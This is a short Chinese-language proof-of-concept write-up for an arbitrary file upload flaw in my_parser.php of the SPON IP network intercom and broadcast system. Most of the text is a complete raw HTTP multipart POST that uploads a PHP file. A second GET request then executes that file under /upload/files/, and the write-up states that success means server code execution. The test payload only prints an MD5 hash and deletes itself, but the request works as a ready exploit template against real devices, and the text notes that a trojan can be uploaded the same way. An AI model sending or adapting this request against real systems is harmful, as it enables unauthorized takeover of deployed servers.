1. 漏洞描述
===============
世邦通信 SPON IP网络对讲广播系统 my_parser.php 存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。
`POST /upload/my_parser.php HTTP/1.1``Host:` `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36``Content-Length: 277``Content-Type: multipart/form-data; boundary=0300a03a9419748c18d96a7e6e03d7be6f7f3f1ef6df950f196738fe8230``Accept-Encoding: gzip, deflate, br``Connection: close`` ``--0300a03a9419748c18d96a7e6e03d7be6f7f3f1ef6df950f196738fe8230``Content-Disposition: form-data; name="upload"; filename="test.php"``Content-Type: application/octet-stream`` ``<?php echo md5(1);unlink(__FILE__);?>``--0300a03a9419748c18d96a7e6e03d7be6f7f3f1ef6df950f196738fe8230--`` `
显示响应码200、相应信息Ok,即为上传成功,上传成功后访问/upload/files/test.php,查看文件是否上传成功,文件是否能够解析。
`GET /upload/files/test.php HTTP/1.1``Host:` `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36``Accept-Encoding: gzip, deflate, br``Connection: close`` `` `
成功执行md5(1),并输出返回信息。